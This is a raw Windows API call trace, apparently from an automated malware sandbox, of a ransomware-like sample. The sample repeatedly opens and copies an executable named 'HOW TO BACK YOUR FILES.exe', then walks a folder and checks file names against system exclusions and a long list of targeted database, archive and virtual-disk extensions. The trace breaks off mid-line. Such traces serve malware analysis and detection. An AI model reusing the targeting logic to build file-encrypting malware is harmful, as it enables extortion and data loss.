[0046.955] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0046.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2cbaa0 [0046.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbaa0 | out: hHeap=0x2b0000) returned 1 [0046.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2e2710 [0046.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0046.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e2710 | out: hHeap=0x2b0000) returned 1 [0046.955] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0046.956] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d6680 [0046.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0046.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d6680 | out: hHeap=0x2b0000) returned 1 [0046.956] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0046.956] UnmapViewOfFile (lpBaseAddress=0xb80000) returned 1 [0046.963] CloseHandle (hObject=0x12c) returned 1 [0046.963] CloseHandle (hObject=0x164) returned 1 [0046.975] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cbb18 | out: hHeap=0x2b0000) returned 1 [0046.975] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0046.975] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0046.978] FindNextFileW (in: hFindFile=0x2cce68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80340916, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7beaaeb8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7beaaeb8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x97958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Tulips.jpg", cAlternateFileName="")) returned 0 [0046.978] FindClose (in: hFindFile=0x2cce68 | out: hFindFile=0x2cce68) returned 1 [0046.978] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c50 [0046.978] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Public\\Music", iMaxLength=260 | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0046.978] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed090 | out: hHeap=0x2b0000) returned 1 [0046.978] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0046.978] lstrlenW (lpString="C:\\Users\\Public\\Music") returned 21 [0046.978] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Public\\Music" | out: lpString1="C:\\Users\\Public\\Music") returned="C:\\Users\\Public\\Music" [0046.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0046.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Public\\Music\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\public\\music\\how to back your files.exe"), bFailIfExists=1) returned 0 [0046.979] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0046.979] GetLastError () returned 0x20 [0046.979] Sleep (dwMilliseconds=0xc8) [0047.190] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0047.190] GetLastError () returned 0x20 [0047.190] Sleep (dwMilliseconds=0xc8) [0047.396] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0047.396] GetLastError () returned 0x20 [0047.396] Sleep (dwMilliseconds=0xc8) [0047.600] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0047.611] GetLastError () returned 0x20 [0047.611] Sleep (dwMilliseconds=0xc8) [0047.815] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0047.815] GetLastError () returned 0x20 [0047.815] Sleep (dwMilliseconds=0xc8) [0048.017] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.025] GetLastError () returned 0x20 [0048.025] Sleep (dwMilliseconds=0xc8) [0048.223] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.223] GetLastError () returned 0x20 [0048.223] Sleep (dwMilliseconds=0xc8) [0048.418] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.418] GetLastError () returned 0x20 [0048.418] Sleep (dwMilliseconds=0xc8) [0048.624] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.624] GetLastError () returned 0x20 [0048.624] Sleep (dwMilliseconds=0xc8) [0048.822] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0048.822] GetLastError () returned 0x20 [0048.822] Sleep (dwMilliseconds=0xc8) [0049.027] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.027] GetLastError () returned 0x20 [0049.027] Sleep (dwMilliseconds=0xc8) [0049.230] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.230] GetLastError () returned 0x20 [0049.230] Sleep (dwMilliseconds=0xc8) [0049.438] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.439] GetLastError () returned 0x20 [0049.439] Sleep (dwMilliseconds=0xc8) [0049.646] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.646] GetLastError () returned 0x20 [0049.646] Sleep (dwMilliseconds=0xc8) [0049.839] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0049.839] GetLastError () returned 0x20 [0049.839] Sleep (dwMilliseconds=0xc8) [0050.049] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0050.049] GetLastError () returned 0x0 [0050.049] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x326fb0 [0050.049] ReadFile (in: hFile=0x154, lpBuffer=0x326fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x326fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0050.049] CloseHandle (hObject=0x154) returned 1 [0050.049] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x326fb0 | out: hHeap=0x2b0000) returned 1 [0050.049] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0050.049] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Music\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4977eaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0050.049] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0050.050] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0050.050] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0050.050] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4977eaa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4977eaa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0050.050] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0050.050] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0050.050] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0050.050] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0050.050] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28305c4e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28305c4e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x288ad099, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0050.050] lstrlenW (lpString="desktop.ini") returned 11 [0050.050] lstrlenW (lpString="C:\\Users\\Public\\Music\\*") returned 23 [0050.050] lstrcpyW (in: lpString1=0x2cce42c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0050.050] lstrlenW (lpString="desktop.ini") returned 11 [0050.050] lstrlenW (lpString="Ares865") returned 7 [0050.050] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0050.050] lstrlenW (lpString=".dll") returned 4 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0050.050] lstrlenW (lpString=".lnk") returned 4 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0050.050] lstrlenW (lpString=".ini") returned 4 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0050.050] lstrlenW (lpString=".sys") returned 4 [0050.050] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0050.051] lstrlenW (lpString="desktop.ini") returned 11 [0050.051] lstrlenW (lpString="bak") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0050.051] lstrlenW (lpString="ba_") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0050.051] lstrlenW (lpString="dbb") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0050.051] lstrlenW (lpString="vmdk") returned 4 [0050.051] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0050.051] lstrlenW (lpString="rar") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0050.051] lstrlenW (lpString="zip") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0050.051] lstrlenW (lpString="tgz") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0050.051] lstrlenW (lpString="vbox") returned 4 [0050.051] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0050.051] lstrlenW (lpString="vdi") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0050.051] lstrlenW (lpString="vhd") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0050.051] lstrlenW (lpString="vhdx") returned 4 [0050.051] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0050.051] lstrlenW (lpString="avhd") returned 4 [0050.051] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0050.051] lstrlenW (lpString="db") returned 2 [0050.051] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0050.051] lstrlenW (lpString="db2") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0050.051] lstrlenW (lpString="db3") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0050.051] lstrlenW (lpString="dbf") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0050.051] lstrlenW (lpString="mdf") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0050.051] lstrlenW (lpString="mdb") returned 3 [0050.051] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0050.051] lstrlenW (lpString="sql") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0050.052] lstrlenW (lpString="sqlite") returned 6 [0050.052] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0050.052] lstrlenW (lpString="sqlite3") returned 7 [0050.052] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0050.052] lstrlenW (lpString="sqlitedb") returned 8 [0050.052] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0050.052] lstrlenW (lpString="xml") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0050.052] lstrlenW (lpString="$er") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0050.052] lstrlenW (lpString="4dd") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0050.052] lstrlenW (lpString="4dl") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0050.052] lstrlenW (lpString="^^^") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0050.052] lstrlenW (lpString="abs") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0050.052] lstrlenW (lpString="abx") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0050.052] lstrlenW (lpString="accdb") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0050.052] lstrlenW (lpString="accdc") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0050.052] lstrlenW (lpString="accde") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0050.052] lstrlenW (lpString="accdr") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0050.052] lstrlenW (lpString="accdt") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0050.052] lstrlenW (lpString="accdw") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0050.052] lstrlenW (lpString="accft") returned 5 [0050.052] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0050.052] lstrlenW (lpString="adb") returned 3 [0050.052] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0050.052] lstrlenW (lpString="adb") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0050.053] lstrlenW (lpString="ade") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0050.053] lstrlenW (lpString="adf") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0050.053] lstrlenW (lpString="adn") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0050.053] lstrlenW (lpString="adp") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0050.053] lstrlenW (lpString="alf") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0050.053] lstrlenW (lpString="ask") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0050.053] lstrlenW (lpString="btr") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0050.053] lstrlenW (lpString="cat") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0050.053] lstrlenW (lpString="cdb") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0050.053] lstrlenW (lpString="ckp") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0050.053] lstrlenW (lpString="cma") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0050.053] lstrlenW (lpString="cpd") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0050.053] lstrlenW (lpString="dacpac") returned 6 [0050.053] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0050.053] lstrlenW (lpString="dad") returned 3 [0050.053] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0050.053] lstrlenW (lpString="dadiagrams") returned 10 [0050.053] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0050.053] lstrlenW (lpString="daschema") returned 8 [0050.053] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0050.053] lstrlenW (lpString="db-journal") returned 10 [0050.053] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0050.053] lstrlenW (lpString="db-shm") returned 6 [0050.053] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0050.053] lstrlenW (lpString="db-wal") returned 6 [0050.054] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0050.054] lstrlenW (lpString="dbc") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0050.054] lstrlenW (lpString="dbs") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0050.054] lstrlenW (lpString="dbt") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0050.054] lstrlenW (lpString="dbv") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0050.054] lstrlenW (lpString="dbx") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0050.054] lstrlenW (lpString="dcb") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0050.054] lstrlenW (lpString="dct") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0050.054] lstrlenW (lpString="dcx") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0050.054] lstrlenW (lpString="ddl") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0050.054] lstrlenW (lpString="dlis") returned 4 [0050.054] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0050.054] lstrlenW (lpString="dp1") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0050.054] lstrlenW (lpString="dqy") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0050.054] lstrlenW (lpString="dsk") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0050.054] lstrlenW (lpString="dsn") returned 3 [0050.054] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0050.055] lstrlenW (lpString="dtsx") returned 4 [0050.055] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0050.055] lstrlenW (lpString="dxl") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0050.055] lstrlenW (lpString="eco") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0050.055] lstrlenW (lpString="ecx") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0050.055] lstrlenW (lpString="edb") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0050.055] lstrlenW (lpString="epim") returned 4 [0050.055] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0050.055] lstrlenW (lpString="fcd") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0050.055] lstrlenW (lpString="fdb") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0050.055] lstrlenW (lpString="fic") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0050.055] lstrlenW (lpString="flexolibrary") returned 12 [0050.055] lstrlenW (lpString="fm5") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0050.055] lstrlenW (lpString="fmp") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0050.055] lstrlenW (lpString="fmp12") returned 5 [0050.055] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0050.055] lstrlenW (lpString="fmpsl") returned 5 [0050.055] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0050.055] lstrlenW (lpString="fol") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0050.055] lstrlenW (lpString="fp3") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0050.055] lstrlenW (lpString="fp4") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0050.055] lstrlenW (lpString="fp5") returned 3 [0050.055] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0050.055] lstrlenW (lpString="fp7") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0050.056] lstrlenW (lpString="fpt") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0050.056] lstrlenW (lpString="frm") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0050.056] lstrlenW (lpString="gdb") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0050.056] lstrlenW (lpString="gdb") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0050.056] lstrlenW (lpString="grdb") returned 4 [0050.056] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0050.056] lstrlenW (lpString="gwi") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0050.056] lstrlenW (lpString="hdb") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0050.056] lstrlenW (lpString="his") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0050.056] lstrlenW (lpString="ib") returned 2 [0050.056] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0050.056] lstrlenW (lpString="idb") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0050.056] lstrlenW (lpString="ihx") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0050.056] lstrlenW (lpString="itdb") returned 4 [0050.056] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0050.056] lstrlenW (lpString="itw") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0050.056] lstrlenW (lpString="jet") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0050.056] lstrlenW (lpString="jtx") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0050.056] lstrlenW (lpString="kdb") returned 3 [0050.056] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0050.056] lstrlenW (lpString="kexi") returned 4 [0050.056] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0050.056] lstrlenW (lpString="kexic") returned 5 [0050.056] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0050.056] lstrlenW (lpString="kexis") returned 5 [0050.057] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0050.057] lstrlenW (lpString="lgc") returned 3 [0050.057] lstrcmpiW (lpString1="ini", 